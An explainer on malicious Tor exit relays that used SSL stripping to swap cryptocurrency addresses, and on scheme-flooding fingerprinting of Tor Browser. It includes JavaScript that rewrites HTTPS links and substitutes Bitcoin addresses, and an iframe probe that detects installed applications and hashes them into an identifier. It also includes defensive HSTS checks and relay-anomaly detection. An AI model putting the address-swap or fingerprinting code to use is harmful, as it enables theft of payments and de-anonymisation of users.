Malicious actors have been adding their own servers to the Tor network since January 2020, chiefly to intercept the traffic of users visiting cryptocurrency sites. The attackers configure each server as an exit relay, the last hop before traffic leaves Tor for the public internet. An exit relay cannot see who the user is, but it does see, and can modify, every connection that is not encrypted end to end, which is what makes that position attractive. The relays tamper with traffic mainly through SSL stripping, downgrading HTTPS connections to plaintext HTTP. Scheme flooding, a separate browser-fingerprinting technique that also affects Tor Browser users, is discussed further below.
By May 2021 the attackers had run well over a thousand malicious exit relays, which single out traffic bound for cryptocurrency mixing services. The stripping attack downgrades such connections from HTTPS to HTTP, so the data is no longer encrypted between the user and the site. Analysts believe the purpose of the downgrade is to replace the cryptocurrency addresses shown on those pages with addresses the attackers control, diverting users' payments to the attackers' own wallets.
The security researcher known as Nusenu, a Tor relay operator, first reported the attacks in August 2020. They came in waves of malicious exit relays added on three separate occasions, reaching about 23 percent of the network's exit capacity each time before the Tor directory authorities removed the relays. The Tor Project then issued recommendations for website operators and Tor Browser users, centred on enforcing HTTPS (for example with HSTS) and offering onion services on the operator side, and on verifying that a connection is actually HTTPS on the user side. This advice is particularly relevant to anyone using Tor Browser to reach financial websites.
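To make the attack and the defence concrete, here is an added example that is not code from the article, from Nusenu or from the Tor Project. It models what a malicious exit does to a plaintext HTTP response (the sslstrip rewrite followed by the address swap), and the client-side state (HSTS cache, preload list, HTTPS-Only mode) that decides whether plaintext ever reaches the exit. Every host name, address and HTML fragment is constructed for the example; the two sample addresses are the well-known documentation examples for bech32 and legacy formats.

```javascript
// Added example, not code from the article, Nusenu or the Tor Project. It models
// (1) what a malicious exit does to a plaintext HTTP response and (2) the client
// state that decides whether plaintext ever reaches the exit. Every host, address
// and HTML fragment here is constructed for the example.

// Attacker's substitute payout address: a constructed placeholder, not a real wallet.
const ATTACKER_ADDR = '1AttackerControlledAddrPLACEHOLDER';

// Bitcoin addresses as they appear in page text: bech32 (bc1...) or legacy base58 (1... / 3...).
const BTC_ADDRESS = /\b(?:bc1[ac-hj-np-z02-9]{25,62}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})\b/g;

// A mixer-style page body as the exit sees it once the session is plaintext.
// Constructed sample; the two addresses are the standard documentation examples.
const SAMPLE_HTML = `<html><body>
<a href="https://example-mixer.test/deposit">Deposit</a>
<p>Send funds to bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq</p>
<p>Legacy address: 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2</p>
</body></html>`;

// Exit-side tampering. Step 1 is sslstrip proper: every https:// reference is
// rewritten to http:// so the victim's next requests are plaintext too. Step 2 is
// the payoff: any payment address in the body is swapped for the attacker's.
function stripAndSwap(html, attackerAddr = ATTACKER_ADDR) {
  let linksDowngraded = 0;
  let addressesSwapped = 0;
  let body = html.replace(/https:\/\//g, () => { linksDowngraded += 1; return 'http://'; });
  body = body.replace(BTC_ADDRESS, () => { addressesSwapped += 1; return attackerAddr; });
  return { body, linksDowngraded, addressesSwapped };
}

// --- Client side: when does a browser send plaintext at all? ---

// Parse a Strict-Transport-Security header value (RFC 6797). Without a valid
// max-age the header must be ignored, so null is returned.
function parseHsts(value) {
  let maxAge = null;
  let includeSubDomains = false;
  for (const raw of value.split(';')) {
    const d = raw.trim().toLowerCase();
    const m = /^max-age="?(\d+)"?$/.exec(d);
    if (m) maxAge = Number(m[1]);
    else if (d === 'includesubdomains') includeSubDomains = true;
  }
  return maxAge === null ? null : { maxAge, includeSubDomains };
}

// Update the browser's HSTS cache from an HTTPS response. max-age=0 clears the
// entry. Note the trust-on-first-use gap: nothing is ever learned over plain HTTP.
function rememberHsts(cache, host, headerValue, nowSec) {
  const p = parseHsts(headerValue);
  if (!p) return;
  if (p.maxAge === 0) { delete cache[host]; return; }
  cache[host] = { expires: nowSec + p.maxAge, includeSubDomains: p.includeSubDomains };
}

// Walk the host, then each parent domain; a parent's entry covers a subdomain
// only when it carried includeSubDomains.
function hstsCovers(cache, host, nowSec) {
  const labels = host.split('.');
  for (let i = 0; i < labels.length - 1; i++) {
    const e = cache[labels.slice(i).join('.')];
    if (e && e.expires > nowSec && (i === 0 || e.includeSubDomains)) return true;
  }
  return false;
}

// Preload entries require includeSubDomains, so a preloaded parent covers every subdomain.
function preloadCovers(preload, host) {
  const labels = host.split('.');
  for (let i = 0; i < labels.length - 1; i++) {
    if (preload.has(labels.slice(i).join('.'))) return true;
  }
  return false;
}

// The question operators and users actually control: will this request leave the
// browser as plaintext, giving the exit something to strip and rewrite?
function exitCanTamper(url, { cache = {}, preload = new Set(), httpsOnly = false, nowSec = 0 } = {}) {
  const u = new URL(url);
  if (u.protocol === 'https:') return false;            // TLS end to end; the exit relays ciphertext
  if (httpsOnly) return false;                           // browser upgrades to https or refuses
  if (preloadCovers(preload, u.hostname)) return false;  // protected even on the very first visit
  return !hstsCovers(cache, u.hostname, nowSec);         // dynamic HSTS: only after a prior clean HTTPS visit
}

console.log(stripAndSwap(SAMPLE_HTML));
console.log('first visit over http, no HSTS:', exitCanTamper('http://example-mixer.test/'));
```

Two things the model makes visible: dynamic HSTS is trust-on-first-use, so a user whose very first visit to the mixer is over plaintext is unprotected until a clean HTTPS response has been seen, which is why preloading (or HTTPS-Only mode) matters; and an onion service has no exit relay at all, since the circuit terminates inside the Tor network, which is why the Tor Project recommends offering one.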
Nusenu's follow-up findings, reported by The Record in May 2021, show the threat actor continuing its attacks despite their public exposure. The actor's relays exceeded a quarter of the Tor network's exit capacity on two occasions in 2021, peaking at 27 percent in February. The second wave was eventually detected and the malicious exit relays removed, but they had been intercepting traffic for at least weeks and possibly months before that.
The attacks succeeded over those 16 months largely because the actor added malicious exit relays slowly enough to stay unnoticed. In May 2021 the actor changed tactics, probably after losing its entire infrastructure to yet another removal, and tried to bring all of its relays online at the same time. That wave was detected within a day: the number of exit relays in the network jumped from roughly 1,500 to more than 2,500, a change that anyone watching the network could not miss.
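The two signals described above, one actor quietly accumulating exit share and a sudden jump in the exit relay count, can both be checked from a network snapshot. The following is an added example, not Nusenu's tooling or anything the Tor Project publishes. The relay records are constructed in the shape of Onionoo "details" documents (fingerprint, contact, first_seen, flags, consensus_weight), with made-up values; the daily exit counts are likewise constructed, and the 5 percent threshold and 1.5x spike factor are assumptions chosen for illustration.

```javascript
// Added example, not Nusenu's tooling or Tor Project code. Records are constructed
// in the shape of Onionoo "details" documents; all values are made up.

const SNAPSHOT = [
  { fingerprint: 'A1'.repeat(20), nickname: 'longtimeexit', contact: 'ops@relay-collective.test',
    first_seen: '2018-03-01 10:00:00', flags: ['Exit', 'Fast', 'Guard', 'Running', 'Stable', 'Valid'], consensus_weight: 30000 },
  { fingerprint: 'B2'.repeat(20), nickname: 'uniexit', contact: 'noc@university.test',
    first_seen: '2019-07-14 08:00:00', flags: ['Exit', 'Fast', 'Running', 'Stable', 'Valid'], consensus_weight: 25000 },
  { fingerprint: 'C3'.repeat(20), nickname: 'middleonly', contact: 'ops@relay-collective.test',
    first_seen: '2018-03-01 10:00:00', flags: ['Fast', 'Guard', 'Running', 'Stable', 'Valid'], consensus_weight: 40000 },
  // Four relays that appeared within minutes of each other, two sharing a contact
  // written slightly differently and two with no contact at all.
  { fingerprint: 'D4'.repeat(20), nickname: 'exit001', contact: 'Admin <relayop@example.test>',
    first_seen: '2021-05-04 12:00:00', flags: ['Exit', 'Fast', 'Running', 'Valid'], consensus_weight: 9000 },
  { fingerprint: 'E5'.repeat(20), nickname: 'exit002', contact: 'admin <RELAYOP@example.test>',
    first_seen: '2021-05-04 12:05:00', flags: ['Exit', 'Fast', 'Running', 'Valid'], consensus_weight: 9000 },
  { fingerprint: 'F6'.repeat(20), nickname: 'exit003', contact: null,
    first_seen: '2021-05-04 12:10:00', flags: ['Exit', 'Fast', 'Running', 'Valid'], consensus_weight: 9000 },
  { fingerprint: 'A7'.repeat(20), nickname: 'exit004', contact: '',
    first_seen: '2021-05-04 12:15:00', flags: ['Exit', 'Fast', 'Running', 'Valid'], consensus_weight: 9000 },
  { fingerprint: 'B8'.repeat(20), nickname: 'hobbyexit', contact: 'me@hobby.test',
    first_seen: '2020-11-20 09:00:00', flags: ['Exit', 'Fast', 'Running', 'Valid'], consensus_weight: 9000 },
];

// Constructed daily exit-relay counts; the last day is the "all at once" pattern.
const DAILY_EXIT_COUNTS = [
  { date: '2021-04-28', exits: 1500 }, { date: '2021-04-29', exits: 1510 },
  { date: '2021-04-30', exits: 1495 }, { date: '2021-05-01', exits: 1520 },
  { date: '2021-05-02', exits: 1505 }, { date: '2021-05-03', exits: 1498 },
  { date: '2021-05-04', exits: 2510 },
];

function isExit(relay) { return (relay.flags || []).includes('Exit'); }

// Collapse case and whitespace so cosmetic variations of one ContactInfo group together;
// missing contact is its own bucket because the actor has also run relays with none.
function normalizeContact(contact) {
  return (contact || '').trim().toLowerCase().replace(/\s+/g, ' ') || '(none)';
}

function firstSeenDay(relay) { return (relay.first_seen || '').slice(0, 10) || 'unknown'; }

// Share of total exit consensus weight held by each group, largest first.
function exitShareBy(relays, keyFn) {
  const exits = relays.filter(isExit);
  const total = exits.reduce((sum, r) => sum + r.consensus_weight, 0);
  const groups = new Map();
  for (const r of exits) {
    const key = keyFn(r);
    const g = groups.get(key) || { key, relays: 0, weight: 0 };
    g.relays += 1;
    g.weight += r.consensus_weight;
    groups.set(key, g);
  }
  return [...groups.values()]
    .map(g => ({ ...g, share: total ? g.weight / total : 0 }))
    .sort((a, b) => b.share - a.share);
}

// Flag multi-relay groups above the threshold, grouping both by contact and by
// first-seen day. A single large relay is a different (bandwidth) question and is
// deliberately not flagged here.
function suspiciousGroups(relays, threshold = 0.05) {
  const dimensions = [['contact', r => normalizeContact(r.contact)], ['first_seen', firstSeenDay]];
  const flagged = [];
  for (const [dimension, keyFn] of dimensions) {
    for (const g of exitShareBy(relays, keyFn)) {
      if (g.share > threshold && g.relays > 1) flagged.push({ dimension, ...g });
    }
  }
  return flagged;
}

// Days on which the exit count exceeds `factor` times the median of the preceding
// `window` days (upper median for even-sized windows).
function exitCountSpikes(daily, factor = 1.5, window = 7) {
  const spikes = [];
  for (let i = 1; i < daily.length; i++) {
    const prev = daily.slice(Math.max(0, i - window), i).map(d => d.exits).sort((a, b) => a - b);
    const baseline = prev[Math.floor(prev.length / 2)];
    if (daily[i].exits > baseline * factor) spikes.push({ date: daily[i].date, exits: daily[i].exits, baseline });
  }
  return spikes;
}

console.log(suspiciousGroups(SNAPSHOT));
console.log(exitCountSpikes(DAILY_EXIT_COUNTS));
```

Against the constructed snapshot the four same-day relays hold 36 percent of exit weight and show up under both groupings, while the long-standing large operators, each running one exit, do not. The slow-accumulation variant of the attack is exactly what the first check is for; the count-spike check only catches the May 2021 behaviour.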
Nusenu estimates that the attackers still controlled about five percent of the network's exit capacity as of May 5, 2021, even after losing more than 1,000 relays. The relays also appear to modify file downloads after stripping HTTPS, although exactly what is changed is unclear. Scheme flooding, described next, is a different threat to the same users: a browser-fingerprinting technique rather than tampering with traffic at an exit relay.
Scheme flooding affects Tor Browser as well as several other desktop browsers. FingerprintJS, a fraud-prevention company, disclosed the technique in 2021 while working on its browser-fingerprinting library. It yields a stable identifier for an affected browser, and a malicious site could use that identifier to undo a Tor user's anonymity by linking visits across sessions and tracking browsing activity.
The technique exploits how browsers handle custom URL schemes, the links (such as skype: or zoommtg:) that prompt the browser to open an associated desktop application. A browser behaves slightly differently when asked to open a scheme that has a registered handler than when it has none, so a page can probe a long list of schemes and learn which applications are installed, even in private browsing mode. The list of installed applications is the same from one session to the next, which is what makes it usable as an identifier.
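The two halves of the technique, the per-scheme probe and the identifier built from its answers, look like this. This is an added example and not FingerprintJS's demonstration code or anything from the article. The probe is a simplified form of the Firefox variant as FingerprintJS described it (navigating a hidden iframe to an unknown scheme produces an internal error page the embedding page cannot touch, while a registered scheme leaves an accessible about:blank); it runs only in a browser, and the affected versions have since been patched, so real results will vary. The scheme list and the 100 ms settle time are assumptions; the identifier construction is pure and runs anywhere.

```javascript
// Added example, not FingerprintJS's demo code. The probe is a simplified Firefox
// variant as FingerprintJS described it and is browser-only; the identifier
// construction is pure. Scheme list and timing are assumptions.

const PROBE_SCHEMES = ['skype', 'spotify', 'zoommtg', 'vscode', 'slack', 'discord',
  'steam', 'whatsapp', 'tg', 'ms-word', 'itunes', 'notion'];

// FNV-1a 32-bit: a compact, stable handle for the fingerprint bit string.
function fnv1a32(str) {
  let h = 0x811c9dc5;
  for (let i = 0; i < str.length; i++) {
    h ^= str.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h;
}

// Pure: turn {scheme: boolean} probe results into an identifier. The bit string
// (one bit per probed scheme, in list order) is the fingerprint itself; schemes
// not in the list are ignored, so the identifier depends only on the list.
function buildIdentifier(results, schemes = PROBE_SCHEMES) {
  const bits = schemes.map(s => (results[s] ? '1' : '0')).join('');
  return { bits, id: fnv1a32(bits).toString(16).padStart(8, '0') };
}

// Browser-only probe (Firefox variant, simplified). Resolves true when the scheme
// appears to have a registered handler. Assumes the page may create hidden iframes.
function probeScheme(scheme, settleMs = 100) {
  return new Promise(resolve => {
    const frame = document.createElement('iframe');
    frame.style.display = 'none';
    document.body.appendChild(frame);
    frame.src = `${scheme}://probe`;
    setTimeout(() => {
      let registered;
      try {
        // Still about:blank and same-origin => the scheme was handed to an app.
        // SecurityError => the browser swapped in its own error page => no handler.
        void frame.contentWindow.document;
        registered = true;
      } catch (_) {
        registered = false;
      }
      frame.remove();
      resolve(registered);
    }, settleMs);
  });
}

// Probe sequentially (one handler decision at a time) and build the identifier.
async function fingerprintBrowser(schemes = PROBE_SCHEMES) {
  const results = {};
  for (const scheme of schemes) results[scheme] = await probeScheme(scheme);
  return buildIdentifier(results, schemes);
}

// Runs the probe in a browser; does nothing under Node, where the pure part is testable.
if (typeof document !== 'undefined') {
  fingerprintBrowser().then(fp => console.log('scheme-flooding fingerprint', fp));
}
```

The defensive point is visible in `buildIdentifier`: with twelve probed schemes there are up to 4096 distinct bit strings, and the set of installed applications rarely changes between sessions, so the identifier survives cookie clearing and new Tor circuits alike. A browser that answers every probe identically, which is what the fixes amount to, collapses all users to the same string.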